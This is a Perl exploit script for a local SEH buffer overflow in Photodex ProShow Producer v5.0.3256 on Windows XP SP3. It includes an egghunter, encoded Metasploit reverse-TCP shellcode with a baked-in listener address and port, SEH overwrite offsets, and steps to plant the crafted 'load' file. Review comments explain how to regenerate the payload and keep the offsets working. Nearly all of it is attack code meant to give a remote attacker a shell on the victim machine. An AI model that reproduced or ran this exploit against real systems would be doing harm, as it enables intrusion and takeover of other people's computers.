
# Title : Photodex ProShow Producer v5.0.3256 Local Buffer Overflow Exploit
# Published : 2012-07-23
# Author :


#######################################################################################
# Exploit Title: Photodex ProShow Producer v5.0.3256 - Local Buffer Overflow Exploit
# Date: 22/07/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://files.photodex.com/release/pspro_50_3256.exe
# Version: v5.0.3256
# Tested on: Windows XP SP3
# +-----------------------------------------------------+
# | This vulnerability was discovered and researched 	|
# | by Julien Ahrens [from Inshell]			|
# | http://www.exploit-db.com/exploits/19563/		|
# +-----------------------------------------------------+
######################################################################################

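# The egghunter (32 bytes).  Scans memory one page at a time for the 8-byte
# marker "w00tw00t" that the builder below places directly in front of the
# shellcode, then jumps to the first byte after the marker.  The int 0x2e
# system call (eax = 2) is used as a safe "is this page readable?" probe so the
# scan never faults on an unmapped page (skape-style hunter).
# NOTE(review): the published listing had its backslashes stripped ("x66x81...");
# the bytes are restored here as proper "\x" escapes - without them the string
# is plain ASCII and every length()-based offset in this script is wrong.
$egghunter =
    "\x66\x81\xCA\xFF\x0F" .    # or   dx, 0x0fff   - align to the next page
    "\x42"                 .    # inc  edx
    "\x52"                 .    # push edx
    "\x6A\x02\x58"         .    # push 2 / pop eax - syscall number
    "\xCD\x2E"             .    # int  0x2e
    "\x3C\x05"             .    # cmp  al, 5       - low byte of 0xC0000005 => page unreadable
    "\x5A"                 .    # pop  edx
    "\x74\xEF"             .    # je   (next page)
    "\xB8" . "w00t"        .    # mov  eax, "w00t"  <-- the 4-byte tag
    "\x8B\xFA"             .    # mov  edi, edx
    "\xAF"                 .    # scasd
    "\x75\xEA"             .    # jne  (keep scanning)
    "\xAF"                 .    # scasd             - tag must appear twice
    "\x75\xE7"             .    # jne  (keep scanning)
    "\xFF\xE7";                 # jmp  edi          - land just past "w00tw00t"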

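# MSF windows/shell_reverse_tcp (341 bytes, encoded).
# LHOST=192.168.178.27 LPORT=4444 are baked into these bytes: regenerate the
# payload for your own listener rather than editing the blob by hand, and keep
# the same bad-char constraints (the builder writes the file as raw bytes and
# the egghunter expects the blob to sit right after "w00tw00t").
# NOTE(review): backslashes were stripped in the published listing; restored
# here as "\x" escapes so length($shellcode) is 341, not 4x that.
$shellcode =
    "\xb8\x78\x6f\x18\xec\xdb\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" .
    "\x4f\x31\x42\x14\x83\xea\xfc\x03\x42\x10\x9a\x9a\xe4\x04\xd3" .
    "\x65\x15\xd5\x83\xec\xf0\xe4\x91\x8b\x71\x54\x25\xdf\xd4\x55" .
    "\xce\x8d\xcc\xee\xa2\x19\xe2\x47\x08\x7c\xcd\x58\xbd\x40\x81" .
    "\x9b\xdc\x3c\xd8\xcf\x3e\x7c\x13\x02\x3f\xb9\x4e\xed\x6d\x12" .
    "\x04\x5c\x81\x17\x58\x5d\xa0\xf7\xd6\xdd\xda\x72\x28\xa9\x50" .
    "\x7c\x79\x02\xef\x36\x61\x28\xb7\xe6\x90\xfd\xa4\xdb\xdb\x8a" .
    "\x1e\xaf\xdd\x5a\x6f\x50\xec\xa2\x23\x6f\xc0\x2e\x3a\xb7\xe7" .
    "\xd0\x49\xc3\x1b\x6c\x49\x10\x61\xaa\xdc\x85\xc1\x39\x46\x6e" .
    "\xf3\xee\x10\xe5\xff\x5b\x57\xa1\xe3\x5a\xb4\xd9\x18\xd6\x3b" .
    "\x0e\xa9\xac\x1f\x8a\xf1\x77\x3e\x8b\x5f\xd9\x3f\xcb\x38\x86" .
    "\xe5\x87\xab\xd3\x9f\xc5\xa3\x10\xad\xf5\x33\x3f\xa6\x86\x01" .
    "\xe0\x1c\x01\x2a\x69\xba\xd6\x4d\x40\x7a\x48\xb0\x6b\x7a\x40" .
    "\x77\x3f\x2a\xfa\x5e\x40\xa1\xfa\x5f\x95\x65\xab\xcf\x46\xc5" .
    "\x1b\xb0\x36\xad\x71\x3f\x68\xcd\x79\x95\x1f\xca\xee\xd6\x88" .
    "\x66\xf5\xbe\xca\x86\x1b\x63\x42\x60\x71\x8b\x02\x3b\xee\x32" .
    "\x0f\xb7\x8f\xbb\x85\x5f\x33\x29\x42\x9f\x3a\x52\xdd\xc8\x6b" .
    "\xa4\x14\x9c\x81\x9f\x8e\x82\x5b\x79\xe8\x06\x80\xba\xf7\x87" .
    "\x45\x86\xd3\x97\x93\x07\x58\xc3\x4b\x5e\x36\xbd\x2d\x08\xf8" .
    "\x17\xe4\xe7\x52\xff\x71\xc4\x64\x79\x7e\x01\x13\x65\xcf\xfc" .
    "\x62\x9a\xe0\x68\x63\xe3\x1c\x09\x8c\x3e\xa5\x39\xc7\x62\x8c" .
    "\xd1\x8e\xf7\x8c\xbf\x30\x22\xd2\xb9\xb2\xc6\xab\x3d\xaa\xa3" .
    "\xae\x7a\x6c\x58\xc3\x13\x19\x5e\x70\x13\x08";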


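# Build the "load" file that proshow.exe picks up from its own directory.
#
# Layout (offsets from the original research, Windows XP SP3):
#   [filler ............... 9844 bytes ...............][nSEH][SEH][4 nops][egghunter][nops]
#   filler = "A" * N . "w00tw00t" . shellcode, so the tag + shellcode sit in
#   the filler and the egghunter placed after the SEH overwrite can find them.
$file = "load";                                                    # The "load" file
$junk = "\x41" x (9844 - length("w00tw00t") - length($shellcode)); # filler up to the SEH record
$nseh = "\xEB\x06\x90\x90";  # nSEH: short jmp +6, skips over the SEH pointer
$seh  = "\x73\xb0\x22\x10";  # SEH: 0x1022b073 pop/pop/ret in if.dnt (per original research)
# NOTE(review): a fixed pop/pop/ret address only works while if.dnt loads at
# 0x10220000 without SafeSEH/ASLR, which is what the XP SP3 test assumed; do not
# expect this to hold on later Windows builds without re-verifying the module.
$nops    = "\x90" x (100 - length($egghunter));                    # pad the trailer to 100 bytes
$exploit = $junk . "w00tw00t" . $shellcode . $nseh . $seh . "\x90\x90\x90\x90" . $egghunter . $nops;

# Write raw bytes: 3-arg open, checked, and binmode so perl on Windows does not
# turn a 0x0A byte into CR LF and shift every offset above.  Buffered write
# errors only surface at close(), so that is checked too.
open(my $out, '>', $file) or die "Cannot create '$file': $!\n";
binmode($out);
print {$out} $exploit;
close($out) or die "Cannot write '$file': $!\n";

print "\n[!] The 'load' file, was created successfully (" . (length $exploit) . " bytes) [!]\n\n";
print "[+] Place the arbitrary 'load' file, into the application directory.\n";
print "[+] Execute the application (proshow.exe) \n";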